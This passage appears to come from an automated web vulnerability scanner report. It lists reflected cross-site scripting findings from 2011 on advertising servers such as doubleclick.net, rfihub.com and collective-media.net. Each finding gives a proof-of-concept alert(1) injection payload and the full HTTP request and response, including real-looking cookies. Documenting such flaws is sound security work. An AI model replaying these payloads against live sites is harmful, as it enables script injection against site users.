The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4b37'-alert(1)-'600aca90b1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.drudgerep/;sz=300x250;click0=;ord=$cacheBuster$&d4b37'-alert(1)-'600aca90b1e=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Date: Mon, 14 Feb 2011 02:10:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 02:10:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.drudgerep/;sz=300x250;net=cm;ord=$cacheBuster$&d4b37'-alert(1)-'600aca90b1e=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.9. http://a.collective-media.net/adj/cm.drudgerep/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.drudgerep/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b527'-alert(1)-'c296858d3f2 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.drudgerep/;sz=300x250;click0=;ord=$cacheBuster$1b527'-alert(1)-'c296858d3f2 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 444
Date: Mon, 14 Feb 2011 02:10:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 02:10:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.drudgerep/;sz=300x250;net=cm;ord=$cacheBuster$1b527'-alert(1)-'c296858d3f2;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.10. http://a.rfihub.com/sed [pa parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /sed

Issue detail

The value of the pa request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7e6c4'><script>alert(1)</script>cd7c8900c9b was submitted in the pa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre6473367353167e6c4'><script>alert(1)</script>cd7c8900c9b&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a1=1CAESEDwKxKPrWufjyLofYqzf4_4; t=1296740537347; a=c369013694478760033; o=1-BjMxrfcI6jt9; r=1296740536014; k="aAJBlvOUA==AGnmc809AN1288024309000AAABLgCILYI=AGnmc801AN1288021692000AAABLgCILYI=AGnmc829AN1288026445000AAABLgCILYI=AGnmc736AN1288018708000AAABLgCILYI=AGnmc805AN1288021876000AAABLgCILYI=AGnmc825AN1288026116000AAABLgCILYI=AGnmc773AN1288019600000AAABLgCILYI=AGnmc747AN1288024980000AAABLgCILYI=AGnmc748AN1288024901000AAABLgCILYI="; s="aAE-DNNhg==AE9479AN1294103956000AAABLgq3o_Y=AF12446AN1285279980000AAABLgq3o_Y=AE9438AN1273618082000AAABLgBpdhw=AE8438AN1275963655000AAABLgBpdhw="; b="aAMN9qejw==AD741AAABLgrfWIY=AD793AAABLgrfWIY=AD809AAABLgrfWIY=AD825AAABLgrfWIY=AD736AAABLgrfWIY=AD781AAABLgrfWIY=AD829AAABLgrfWIY=AD748AAABLgrfWIY=AD801AAABLgrfWIY=AD773AAABLgrfWIY=AD747AAABLgrfWIY=AD805AAABLgBphCs="; m="aAGRcyqzg==AI20472726AAABLgrfWIc=AI20472726AAABLgrTunc=AI20472726AAABLgq3K4s=AI20472726AAABLgBphCw=AI20472701AAABLffM4Y0=AI20472701AAABLevCTs8="; g="aAG9rzUwA==A_aBXkOpUe5j7vA|15706|73437|68086|14121|1243|92405|445|32981|7792AAABLhsS7_s=A_akezhu0C40Skt|15706|73437|68086|14121|1243|92405|445|32981|7792AAABLhsSR2I=A_a2pwDXuoO-PeR|15705|73433|68086|14121|1243|92574|445|32521|7792AAABLgq3o_o=A_a9RXWgJTWnNNS|14969|69553|60848|13007|1144|90136|306|32226|7317AAABLgCILYY=A_aFWCVjo6agoYc|16569|76934|70571|14534|1277|92574|445|32490|7755AAABLgBpfaE=A9aTqK7H67WacJ_|9542|45408|51494|13737|830|92405|445|29513|7557AAABLgBpdh8="; c="aAh4fa6Qg==AFd1243AB3AAABLhsS7_c=AFv2946AB3AAABLhsS7_c=AGu14941AB3AAABLhsS7_c=AFc1243AB3AAABLhsS7_c=AFl2946AB3AAABLhsS7_c=AGt14941AB3AAABLhsS7_c=AGb15706AB2AAABLhsS7_c=AGa15706AB2AAABLhsS7_c=AGb15705AB1AAABLgq3o_Y=AGa15705AB1AAABLgq3o_Y=AFd1144AB1AAABLgCILYI=AFv2383AB1AAABLgCILYI=AGu11341AB1AAABLgCILYI=AFc1144AB1AAABLgCILYI=AFl2383AB1AAABLgCILYI=AGb14969AB1AAABLgCILYI=AGa14969AB1AAABLgCILYI=AFd1277AB1AAABLgBpfZ4=AFv3000AB1AAABLgBpfZ4=AGu15506AB1AAABLgBpfZ4=AFc1277AB1AAABLgBpfZ4=AFl3000AB1AAABLgBpfZ4=AGt15506AB1AAABLgBpfZ4=AGb16569AB1AAABLgBpfZ4=AGa16569AB1AAABLgBpfZ4=AEd830AB1AAABLgBpdhw=AFv1265AB1AAABLgBpdhw=AFu5385AB1AAABLgBpdhw=AEc830AB1AAABLgBpdhw=AFl1265AB1AAABLgBpdhw=AFt5385AB1AAABLgBpdhw=AFb9542AB1AAABLgBpdhw=AFa9542AB1AAABLgBpdhw="; f="aAFSdsTtQ==AK1297534306AB2AAABLhsS7_c=AK1297259930AB2AAABLgrfWIY=AK1297087034AB4AAABLgCILYI=AK1296942555AB1AAABLffM4Y0=AK1296740536AB1AAABLevCTs4="; e=cd

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Content-Type: text/html; charset=iso-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: g="aAHN7Dy1Q==A_ax3hqHhIaQ7kH|15705|73433|68086|14121|1243|92574|445|32981|7792AAABLiHOrUw=A_aBXkOpUe5j7vA|15706|73437|68086|14121|1243|92405|445|32981|7792AAABLhsS7_s=A_akezhu0C40Skt|15706|73437|68086|14121|1243|92405|445|32981|7792AAABLhsSR2I=A_a2pwDXuoO-PeR|15705|73433|68086|14121|1243|92574|445|32521|7792AAABLgq3o_o=A_a9RXWgJTWnNNS|14969|69553|60848|13007|1144|90136|306|32226|7317AAABLgCILYY=A_aFWCVjo6agoYc|16569|76934|70571|14534|1277|92574|445|32490|7755AAABLgBpfaE=A9aTqK7H67WacJ_|9542|45408|51494|13737|830|92405|445|29513|7557AAABLgBpdh8=";Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-12 01:35:16 GMT
Set-Cookie: c="aAh0Fw84g==AFd1243AB4AAABLiHOrUg=AFv2946AB4AAABLiHOrUg=AGu14941AB4AAABLiHOrUg=AFc1243AB4AAABLiHOrUg=AFl2946AB4AAABLiHOrUg=AGt14941AB4AAABLiHOrUg=AGb15705AB2AAABLiHOrUg=AGa15705AB2AAABLiHOrUg=AGb15706AB2AAABLhsS7_c=AGa15706AB2AAABLhsS7_c=AFd1144AB1AAABLgCILYI=AFv2383AB1AAABLgCILYI=AGu11341AB1AAABLgCILYI=AFc1144AB1AAABLgCILYI=AFl2383AB1AAABLgCILYI=AGb14969AB1AAABLgCILYI=AGa14969AB1AAABLgCILYI=AFd1277AB1AAABLgBpfZ4=AFv3000AB1AAABLgBpfZ4=AGu15506AB1AAABLgBpfZ4=AFc1277AB1AAABLgBpfZ4=AFl3000AB1AAABLgBpfZ4=AGt15506AB1AAABLgBpfZ4=AGb16569AB1AAABLgBpfZ4=AGa16569AB1AAABLgBpfZ4=AEd830AB1AAABLgBpdhw=AFv1265AB1AAABLgBpdhw=AFu5385AB1AAABLgBpdhw=AEc830AB1AAABLgBpdhw=AFl1265AB1AAABLgBpdhw=AFt5385AB1AAABLgBpdhw=AFb9542AB1AAABLgBpdhw=AFa9542AB1AAABLgBpdhw=";Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-12 01:35:16 GMT
Set-Cookie: f="aAGmgjuLw==AK1297647316AB1AAABLiHOrUg=AK1297534306AB2AAABLhsS7_c=AK1297259930AB2AAABLgrfWIY=AK1297087034AB4AAABLgCILYI=AK1296942555AB1AAABLffM4Y0=AK1296740536AB1AAABLevCTs4=";Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-12 01:35:16 GMT
Set-Cookie: e=cb;Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-12 01:35:16 GMT
Content-Length: 2175

<html><body><span id="__rfi" style="height:0px; width:0px"><IFRAME SRC="http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647316296;click=http://a.rfihub.com/aci
...[SNIP]...
border=0 width=0 height=0 src='http://a.rfihub.com/tk.gif?rb=445&re=19969&aa=15705,73433,14121,68086,1243,14941,x3hqHhIaQ7kH,http%3A%2F%2Frocketfuelinc.com,776,2946,32981,1879,7792&pa=ppre6473367353167e6c4'><script>alert(1)</script>cd7c8900c9b&id=&ra=6473163000.11331372547018437'>
...[SNIP]...

1.11. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.270604.B3/B5123509.61

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc59a"-alert(1)-"ed8a505e8a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647300104;click=http://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5&dc59a"-alert(1)-"ed8a505e8a7=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6107

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
okv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5&dc59a"-alert(1)-"ed8a505e8a7=1http%3a%2f%2ft.mookie1.com/t/v1/clk%3FmigAgencyId%3D188%26migSource%3Dadsrv2%26migTrackDataExt%3D2426847%3B58824910%3B234278619%3B39992677%26migRandom%3D2161819%26migTrackFmtExt%3Dclient%3Bio%3Bad%3B
...[SNIP]...

1.12. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.270604.B3/B5123509.61

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcff3"-alert(1)-"0f153e75e05 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647300104;click=http://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5bcff3"-alert(1)-"0f153e75e05 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:35:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6007

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5bcff3"-alert(1)-"0f153e75e05http://t.mookie1.com/t/v1/clk?migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58824910;234278619;39992677&migRandom=2145756&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.univers
...[SNIP]...

1.13. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4270.Media6Degrees.com/B5094437.9

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57a15"-alert(1)-"a5169947ca5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4270.Media6Degrees.com/B5094437.9;sz=300x250;ord=1297649785346;click0=http://ad.media6degrees.com/adserv/clk?tId=4401087500065260|cId=5193|cb=1297649784|notifyPort=8080|exId=23|tId=4401087500065260|ec=1|secId=859|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|advId=891|notifyServer=asd116.sd.pl.pvt|spId=26917|adType=iframe|invId=3159|bid=1.53|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK&57a15"-alert(1)-"a5169947ca5=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4401087500065260|cb=1297649784|adType=iframe|cId=5193|ec=1|spId=26917|advId=891|exId=23|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|secId=859|invId=3159|notifyServer=asd116.sd.pl.pvt|notifyPort=8080|bid=1.53|srcUrlEnc=http%3A%2F%2Fwww.drudgereport.com%2F|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 02:17:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7933

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
zOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK&57a15"-alert(1)-"a5169947ca5=1http://www.adobe.com/products/creativesuite/design?sdid=IEFXK");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var o
...[SNIP]...

1.14. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4270.Media6Degrees.com/B5094437.9

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edc03"-alert(1)-"53df0e3547d was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4270.Media6Degrees.com/B5094437.9;sz=300x250;ord=1297649785346;click0=http://ad.media6degrees.com/adserv/clk?tId=4401087500065260|cId=5193|cb=1297649784|notifyPort=8080|exId=23|tId=4401087500065260|ec=1|secId=859|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|advId=891|notifyServer=asd116.sd.pl.pvt|spId=26917|adType=iframe|invId=3159|bid=1.53|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXKedc03"-alert(1)-"53df0e3547d HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4401087500065260|cb=1297649784|adType=iframe|cId=5193|ec=1|spId=26917|advId=891|exId=23|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|secId=859|invId=3159|notifyServer=asd116.sd.pl.pvt|notifyPort=8080|bid=1.53|srcUrlEnc=http%3A%2F%2Fwww.drudgereport.com%2F|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 02:16:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7943

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
nzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXKedc03"-alert(1)-"53df0e3547dhttp://www.adobe.com/products/photoshop/photoshop/?sdid=IEFXK");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var ope
...[SNIP]...

1.15. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.msn/B2087123.382

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6b10"-alert(1)-"313bfda1deb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4319.msn/B2087123.382;sz=300x250;;sz=300x250;ord=145238134?click=http://clk.atdmt.com/goiframe/196247526.198101849/270694586/direct/01%3fhref=&a6b10"-alert(1)-"313bfda1deb=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/270694586/direct;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
